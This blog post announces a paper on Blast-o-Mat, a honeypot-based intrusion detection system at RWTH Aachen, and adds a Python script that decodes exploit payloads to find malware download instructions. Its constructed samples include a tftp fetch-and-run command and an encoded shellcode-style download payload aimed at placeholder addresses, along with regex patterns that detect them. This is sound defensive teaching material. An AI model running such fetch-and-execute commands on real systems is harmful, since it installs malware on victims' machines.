Advanced Honeypot-Based Intrusion Detection
Sunday, January 28. 2007
Together with Jan Göbel and Jens Hektor from the Center for Computing and Communication at RWTH Aachen University, I published an article entitled "Advanced Honeypot-Based Intrusion Detection" in the most recent issue of ;login: (Volume 31, Number 6).
The paper describes a custom network intrusion detection system called Blast-o-Mat that is built on several sensors, one of them being nepenthes. We describe the system, summarize the lessons learned, give some quantitative results, and walk through a Haxdoor infection that the system detected.
A live demo of Blast-o-Mat is available at the Blast-o-Mat status page.
Abstract:
At RWTH Aachen University, with about 40,000 computer-using people to support, we have built a system to detect infected machines based on honeypots. One important building block of Blast-o-Mat is Nepenthes, which we use both to detect malware-infected systems and to collect malware. Nepenthes is a low-interaction honeypot that appears as vulnerable software but instead decodes attack code and downloads malware. We have been successful at uncovering and quarantining infected systems with sensors listening at 0.1% of our address space. Investigation of collected malware has led to discovery of many infected systems and even a huge cache of stolen identity information.
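The abstract compresses the detection loop into one sentence: a sensor on an otherwise unused address accepts an exploit, decodes the attack code, and pulls the download instruction out of it; the source of that exploit is by definition an infected host and goes on the quarantine list. The following script is an added illustration of that loop, not code from the paper or from nepenthes. It brute-forces single-byte XOR keys instead of recognising known decoder stubs the way nepenthes does (a simplification assumed for the example), and all addresses, payloads and names are constructed here.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Download instructions a sensor looks for once the attack code is readable.
# Bots either carry a URL inside the shellcode or, when the exploit lands in a
# command shell, type a tftp/ftp fetch command.
URL_RE = re.compile(rb"(?:https?|ftp|tftp)://[\x21-\x7e]+")
TFTP_RE = re.compile(rb"tftp(?:\.exe)?\s+-i\s+(\S+)\s+get\s+(\S+)", re.IGNORECASE)


@dataclass
class Detection:
    source_ip: str          # the attacker, i.e. the infected host to quarantine
    sensor_ip: str          # which unused address took the hit
    xor_key: Optional[int]  # None if the payload was readable as-is
    download: str           # where the malware binary is fetched from


def extract_download(buf: bytes) -> Optional[str]:
    """Return a download location found in a (decoded) payload, else None."""
    m = URL_RE.search(buf)
    if m:
        return m.group(0).decode("ascii")
    m = TFTP_RE.search(buf)
    if m:
        host, name = m.group(1).decode("ascii"), m.group(2).decode("ascii")
        return "tftp://%s/%s" % (host, name)
    return None


def xor_decode(buf: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in buf)


def decode_attack_code(payload: bytes) -> Tuple[Optional[int], Optional[str]]:
    """Find the download instruction: plaintext first, then every 1-byte XOR key.

    nepenthes recognises known decoder stubs and reads the key out of them;
    trying all 255 keys is a simplification assumed for this example.
    """
    found = extract_download(payload)
    if found:
        return None, found
    for key in range(1, 256):
        found = extract_download(xor_decode(payload, key))
        if found:
            return key, found
    return None, None


def analyze(source_ip: str, sensor_ip: str, payload: bytes) -> Optional[Detection]:
    """Turn one captured exploit payload into a detection record, or None."""
    key, download = decode_attack_code(payload)
    if download is None:
        return None
    return Detection(source_ip, sensor_ip, key, download)


def quarantine_list(detections: List[Optional[Detection]]) -> List[str]:
    """Distinct attacking hosts. Anything that fired a decodable exploit at a
    dark address is treated as infected; a single hit is enough."""
    return sorted({d.source_ip for d in detections if d is not None})


# --- constructed sample traffic (TEST-NET addresses, not real captures) -----
SENSOR = "192.0.2.200"

# 1. shellcode-style payload: filler bytes and a URL, XOR-encoded with key 0x99
_PLAIN = b"\x90" * 8 + b"http://192.0.2.10/load.exe\x00" + b"\xcc"
SHELLCODE_PAYLOAD = xor_decode(_PLAIN, 0x99)

# 2. command-shell payload: the bot types a tftp fetch in clear text
SHELL_PAYLOAD = b"cmd /c tftp -i 192.0.2.10 get svc.exe & svc.exe\r\n"

# 3. noise hitting the sensor with no download instruction at all
NOISE_PAYLOAD = b"\x00" * 16

SAMPLES = [
    ("192.0.2.33", SHELLCODE_PAYLOAD),
    ("192.0.2.34", SHELL_PAYLOAD),
    ("192.0.2.35", NOISE_PAYLOAD),
]

if __name__ == "__main__":
    results = [analyze(src, SENSOR, p) for src, p in SAMPLES]
    for r in results:
        if r:
            print("%s -> key=%s download=%s" % (r.source_ip, r.xor_key, r.download))
    print("quarantine:", quarantine_list(results))
```

The third sample shows the one caveat worth remembering when wiring such a sensor into an automatic quarantine: a connection to a dark address is suspicious, but only a payload that actually decodes to a download instruction is treated as proof of infection here, which keeps scanners and misconfigured clients off the block list.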